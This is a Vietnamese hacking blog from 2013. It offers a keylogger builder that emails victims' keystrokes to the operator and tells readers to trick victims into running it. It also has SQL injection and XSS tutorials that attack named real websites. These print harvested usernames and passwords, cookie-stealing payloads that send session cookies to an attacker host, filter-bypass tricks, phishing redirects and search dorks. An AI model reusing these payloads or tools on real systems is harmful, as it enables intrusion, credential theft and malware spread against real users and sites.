Thursday, August 1, 2013
[Release]VVLogger Beta Version
- Dạo gần đây có nhiều bạn quan tâm đến Keylogger và tôi cũng đang trong quá trình lọc lại máy nên tìm thấy dự án cũ tiện thể build ra cho ai quan tâm :D
Đây chỉ là 1 phiên bản nho nhỏ với 1 vài giải pháp tạm thời tạm ổn đối với ai tập tành bây giờ .
- Giao diện Builder :
Read More
Đây chỉ là 1 phiên bản nho nhỏ với 1 vài giải pháp tạm thời tạm ổn đối với ai tập tành bây giờ .
- Giao diện Builder :
- Hướng dẫn sử dụng :
1.Bật VVBuilder.exe sau đó gõ lệnh /START để mở khóa
2.Tiến hành thiết lập gõ lệnh /CONFIG#Your Email#Size Log
3.Bước cuối cùng build stub gõ lệnh /BUILD sau đó nó sẽ tạo ra 1 file có tên vvlogger.exe và nhiệm vụ của bạn là dụ cho victim chạy nó .
Chú thích thêm :
Your Email : bạn nhập email để gởi log về email của bạn
Size Log : vd khi nào file log đủ 100kb nó sẽ tự động gởi bạn có thể tùy chỉnh cho vừa ý
Vd : /CONFIG#vvteam@hotmail.com#100
Bạn sẽ nhận 1 lá thư dạng như thế này :
# | Tên | Phiên bản | Tải về |
---|---|---|---|
1 | VVLogger | Beta | Bấm vào đây |
Password : vvlogger
Sunday, July 28, 2013
[Bài 1]Sql Injection Cơ Bản
Xin chào, hôm nay tôi sẽ tiếp tục bài viết nói về vấn đề Sql Injection .
I. Sql Injection là gì ?
SQL injection là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các câu lệnh SQL bất hợp pháp, Sql injection có thể cho phép những kẻ tấn công thực hiện các thao tác, delete, insert, update,… trên cơ sỡ dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy, lỗi này thường xãy ra trên các ứng dụng web có dữ liệu được quản lý bằng các hệ quản trị cơ sở dữ liệu như SQL Server, MySQL, Oracle, DB2, Sysbase... ( theo wiki )
Đọc thêm tại : http://vi.wikipedia.org/wiki/SQL_injection , mọi thứ bạn cần đọc về nó đều được ghi cụ thể tại đây nên tôi không nhắc lại nữa.
II. Phương pháp tấn công Sql Injection đơn giản.
- Ở đây tôi sẽ hướng dẫn cụ thể về phương pháp này và bài sau tôi sẽ hướng dẫn vượt mặt bộ lọc kiểm tra !
1. Kiểm tra lỗi
Thường thì để kiểm tra lỗi chúng ta sẽ thêm dấu " ' " sau đường link có dạng ?id= hay ?product= ..vv. nếu giao diện website có thay đổi chúng ta biết rằng nó đã dính Sql .
2. Tìm số trường cột
Để tìm số trường cột ta sử dụng câu lệnh truy vấn Order by [số trường cột] -- -
VD : http://www.abc-consultancy.com/newsitem.php?id=29 order by 10-- - : không có biểu hiện gì hết thử hạ xuống xem như thế nào
http://www.abc-consultancy.com/newsitem.php?id=29 order by 8-- - : cũng không có biểu hiện gì hết hạ tiếp
http://www.abc-consultancy.com/newsitem.php?id=29 order by 7-- - : và chúng ta thấy nội dung đã hiển thị chứng tỏ số trường cột của site là 7
Bắt đầu truy vấn , để xem table nó nằm ở trường cột nào ta sử dụng lệnh Union Select 1,2,3,4,5,6,7-- - với 1,2,3,4,5,6,7 là thứ tự số trường cột ! Ngoài ra trước ?id=29 ta sẽ thêm dấu - để hiện các con số đẹp .
3. Lấy tên table :
Ta thấy có 2 con số hiện ra và chúng ta sẽ truy vấn ở trường cột số 5
Và thông tin table ta thu được :
cms_kladblok,cms_links,mailinglist_1,mailinglist_2,mailinglist_3,mailinglist_4,main,newsletter_defaults,newsletter_letter,pub_dokuman,pub_menu,tapugarantie,users,website_dynpage,website_en_mainmenu_links,website_form,website_mainmenu,website_news,website_nl_mainmenu_links,website_publication
Table này sẽ chứa username và password nhưng chưa chắc luôn là vậy nên chúng ta sẽ xem thử tên column trong table đó là gì
4. Xuất ra Column Username và Password trong table Users
Ta chỉ thay đổi table thành column và thêm and table_name=0x7573657273 ( 0x7573657273 là Users được chuyển từ String sang Hex . Có thể chuyển đổi tại đây : http://string-functions.com/string-hex.aspx )
Thông tin ta thu được : id,sesid,username,password,namesurname,songiris,admin
5. Xuất thông tin Username và Password .
- Tới đây ta lượt bỏ bớt và thay vào đó chỉ còn lại là :
0x2f là ký tự ngăn cách giữa username và password ở đây tôi vẫn chuyển từ string sang hex " / " . Và ta có được : serhatoren/kem07er,Levent/oz07ak,ss/abc07,Burak/abc123
6. Giải mã mật khẩu .
- Tuy nhiên hầu hết các website bây giờ đều mã hóa mật khẩu chủ yếu là MD5 nên các bạn có thể sử dụng các website trâ cứu mật khẩu MD5 như :
Đây là 3 website tôi nghĩ nó giúp ích rất nhiều cho attacker hiện nay :D
Kết thúc ! Bài tiếp theo tôi sẽ tiếp tục hướng dẫn kỹ thuật bypass như XSS !
Tổng hợp Tools/Software Hacking/Security
# | Tên | Chức năng | Tải về |
---|---|---|---|
1 | Acunetix | Read Here | Bấm vào đây |
2 | M-Rootkit | Read Here | Bấm vào đây |
3 | Havij 1.15 | Sql Injection | Bấm vào đây |
4 | Web Vuln Scan | Scan Vuln | Bấm vào đây |
5 | Hidden File Finder | Scan and discover all the Hidden files on your Windows | Bấm vào đây |
6 | Patator v0.5 | Multi-purpose brute-forcer, with a modular design and a flexible usage | Bấm vào đây |
[Phần 2]Kiểm tra và khai thác XSS
- Trong phần thứ nhất XSS là gì ? Cách tìm và khai thác tôi đã nói sơ qua về XSS , trong phần này tôi sẽ giải thích phần còn lại của XSS bao gồm phương pháp thực hiện và phương pháp kiểm tra 1 site dính lỗi XSS
5. 1 số Dork XSS thông dụng :
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
- Để kiểm tra site có dính lỗi XSS không chúng ta sẽ thử thêm đoạn : <script>alert("Check XSS")</script>
Ví dụ :
http://www.econedlink.org/economic-calendar.php?month=7&day=25%3Cscript%3Ealert%28%22Check%20XSS%20by%20VVidN%22%29%3C/script%3E
- Nhưng không phải lúc nào cũng vậy , một số phương pháp dùng để vượt qua bộ lọc mà tôi sẽ giới thiệu sắp tới sẽ bớt nhàm chán hơn .
- Ngoài ra chúng ta có thể chèn các đoạn HTML sau đó
http://www.econedlink.org/economic-calendar.php?month=7&day=25%22%3E%3Ciframe%20src=%22http://www.vvteam.blogspot.com%22%20height=400%20width=500%20frameborder=1%20align=center%3E%3C/iframe%3E
6. 1 số thao tác tấn công bằng XSS :
- Bạn có thể trỏ về 1 trang Fishing của bạn và làm gì thì tôi không cần nói .
http://www.econedlink.org/economic-calendar.php?month=7&day=25%3Cscript%3Ewindows.location=%22http://yoursite.com%22;%3C/script%3E
- Hoặc bạn có thể rút ngắn link lại bằng cách sử dụng Url Shorter : http://goo.gl/ để tránh victim phát hiện :D
- Đánh cắp Cookies :
http://www.econedlink.org/economic-calendar.php?month=7&day=25<script>document.location='www.yoursite.com/stealer.php?cookie='+escape(document.cookie);</script>
Với www.yoursite.com/stealer.php là nơi bạn sẽ lưu thông tin đánh cắp được !
7. Kỹ thuật vượt mặt bộ lọc :
- Ngoài những phương pháp kể trên , chúng ta phải biết bypass bộ lọc ví dụ như :
http://eastsideshowroom.com/calendar.php?month=5&year=2012%3Cscript%3Ealert%28%22Checked%20by%20VVidN%22%29%3C/script%3ETa thấy nó không hoạt động, vậy thử đổi string sang char thì như thế nào ?
http://eastsideshowroom.com/calendar.php?month=5&year=2012%3Cscript%3Ealert%28String.fromCharCode%2867,%20104,%20101,%2099,%20107,%20101,%20100,%2032,%2098,%20121,%2032,%2086,%2086,%20105,%20100,%2078%29%29%3C/script%3E
Ồ và nó đã vượt qua bộ lọc rồi .
Tất cả những gì bạn cần :
1. Addon Hackbar dùng để hỗ trợ trong việc chuyển đổi string sang char !
2. 1 số site dùng để rút ngắn URL mục đích là lừa victim :
http://tiny.cc/
http://www.shorturl.com/
http://tinyurl.com/
http://goo.gl/
Saturday, July 27, 2013
[Phần 1]XSS Là Gì ? Cách tìm và khai thác !
Xin chào , hôm nay tôi sẽ viết 1 bài về XSS , cách khai tác và phòng tránh nó ! Let's go .
Tôi sẽ dựa vào 1 số khái niệm cơ bản từ Blog Soleil để khái quát cho các bạn hiểu !
1. XSS là gì ?
- Định nghĩa XSS được hiểu là CrossSite-Scripting , một kỹ thuật hack web phổ biến nhất hiện nay bằng cách chèn vào các URL, các textbox trong thẻ HTML những đoạn Script nguy hiểm từ đó chiếm quyền điều khiển victim và victim sẽ thực hiện những mệnh lệnh được đưa ra ! Ngoài ra nó cũng là một trong những vấn đề bảo mật của nhà phát triển web và người sử dụng web .
- Những đoạn mã được chèn vào hầu hết được viết bằng Client-Site Script như JavaScript, JScript, DHTML .
2. Nguyên lý hoạt động XSS .
- Khi bạn truy cập vào 1 đường dẫn đã bị chèn mã độc, bạn sẽ gởi gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server từ đó cookies , mật khẩu của bạn được lưu trên trình duyệt sẽ gởi về attacker thông qua Email hay 1 file nào đó trong host đã được thiết lập từ trước hoặc bị cài backdoor , malware, virus vào máy victim hoặc bạn có thể trở thành công cụ tấn công của attacker !
3. Loại XSS.
- Có 2 loại XSS cơ bản :
1. Persistent
2. Non-Persistent Type
- Non-Presistent Type : là loại XSS phổ biến được dùng hiện nay , nó đòi hỏi victim truy cập vào 1 đường dẫn mà attacker đã thiết lập sẵn , khi victim truy cập vào các liên kết đó các đoạn mã độc sẽ thực thi bởi trình duyệt của victim, bạn sẽ hiểu cụ thể hơn dưới ví dụ sau :
Ví dụ :
Đây là đoạn mã sẽ bị chèn XSS !
Ví dụ Presistent XSS Attack :
login.php
home.php
Bây giờ attacker sẽ đăng nhập với quyền User như sau :
- Ăn cắp Cookies
- Cướp session làm việc
- Cài Malware,Virus,backdoor vào máy victim
- Deface Website tuy nhiên nó chỉ nằm ở phần bề mặt của Website chứ không làm thay đổi cấu trúc Website
Đến đây tôi xin tạm dừng và phần tiếp theo tôi sẽ viết tiếp sau khi ngủ dậy :D
Read More
Tôi sẽ dựa vào 1 số khái niệm cơ bản từ Blog Soleil để khái quát cho các bạn hiểu !
1. XSS là gì ?
- Định nghĩa XSS được hiểu là CrossSite-Scripting , một kỹ thuật hack web phổ biến nhất hiện nay bằng cách chèn vào các URL, các textbox trong thẻ HTML những đoạn Script nguy hiểm từ đó chiếm quyền điều khiển victim và victim sẽ thực hiện những mệnh lệnh được đưa ra ! Ngoài ra nó cũng là một trong những vấn đề bảo mật của nhà phát triển web và người sử dụng web .
- Những đoạn mã được chèn vào hầu hết được viết bằng Client-Site Script như JavaScript, JScript, DHTML .
2. Nguyên lý hoạt động XSS .
- Khi bạn truy cập vào 1 đường dẫn đã bị chèn mã độc, bạn sẽ gởi gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server từ đó cookies , mật khẩu của bạn được lưu trên trình duyệt sẽ gởi về attacker thông qua Email hay 1 file nào đó trong host đã được thiết lập từ trước hoặc bị cài backdoor , malware, virus vào máy victim hoặc bạn có thể trở thành công cụ tấn công của attacker !
3. Loại XSS.
- Có 2 loại XSS cơ bản :
1. Persistent
2. Non-Persistent Type
- Non-Presistent Type : là loại XSS phổ biến được dùng hiện nay , nó đòi hỏi victim truy cập vào 1 đường dẫn mà attacker đã thiết lập sẵn , khi victim truy cập vào các liên kết đó các đoạn mã độc sẽ thực thi bởi trình duyệt của victim, bạn sẽ hiểu cụ thể hơn dưới ví dụ sau :
Ví dụ :
Đây là đoạn mã sẽ bị chèn XSS !
<?php $name = $_GET['name']; echo "Welcome $name<br>"; echo "<a href="http://yoursite.com/">Click to Download</a>"; ?>Khi chèn XSS sẽ có dạng như sau :
http://yoursite.com/index.php?name=guest<script>alert('VVTeam')</script>- Presistent : trong trường hợp này các đoạn mã độc sẽ được lưu trữ trong database, phương pháp này sẽ làm thay đổi cấu trúc website hiện tại .
Ví dụ Presistent XSS Attack :
login.php
<?php $Host= 'localhost'; $Dbname= 'app'; $User= 'yyy'; $Password= 'xxx'; $Schema = 'test'; $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; /* Connect with database asking for a new connection*/ $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW); /* Error checking the connection string */ if (!$Connect) { echo "Database Connection Failure"; exit; } $query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';"; $result=pg_query($Connect,$query); $row=pg_fetch_array($result,NULL,PGSQL_ASSOC); $user_pass = md5($_POST['pass_word']); $user_name = $row['user_name']; if(strcmp($user_pass,$row['password'])!=0) { echo "Login failed"; } else { # Start the session session_start(); $_SESSION['USER_NAME'] = $user_name; echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>"; } ?>
home.php
<?php session_start(); if(!$_SESSION['USER_NAME']) { echo "Need to login"; } else { $Host= 'localhost'; $Dbname= 'app'; $User= 'yyy'; $Password= 'xxx'; $Schema = 'test'; $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW); if($_SERVER['REQUEST_METHOD'] == "POST") { $query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';"; pg_query($Connect,$query); echo "Update Success"; } else { if(strcmp($_SESSION['USER_NAME'],'admin')==0) { echo "Welcome admin<br><hr>"; echo "List of user's are<br>"; $query = "select display_name from $Schema.members where user_name!='admin'"; $res = pg_query($Connect,$query); while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) { echo "$row[display_name]<br>"; } } else { echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">"; echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">"; echo "<input type=\"submit\" value=\"Update\">"; } } } ?>
Bây giờ attacker sẽ đăng nhập với quyền User như sau :
<a href=# onclick=\"document.location=\'http://remotesite.com/xss.php?c=\'+escape\(document.cookie\)\;\">VVTeam</a>Khi victim truy cập vào hệ thống , victim sẽ thấy 1 user có tên : VVTeam trùng với tên dùng khác , Victim sẽ nhấp vào liên kết ấy nó sẽ gởi cookies , Session ID đến website của attacker ! Ngay lúc đó attacker có thể gởi các yêu cầu đến website và đăng nhập với quyền là Admin dựa vào các Session ID cho đến khi nó hết hạn !
xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f34. Mức độ nguy hiểm của XSS :
- Ăn cắp Cookies
- Cướp session làm việc
- Cài Malware,Virus,backdoor vào máy victim
- Deface Website tuy nhiên nó chỉ nằm ở phần bề mặt của Website chứ không làm thay đổi cấu trúc Website
Đến đây tôi xin tạm dừng và phần tiếp theo tôi sẽ viết tiếp sau khi ngủ dậy :D
Subscribe to:
Posts (Atom)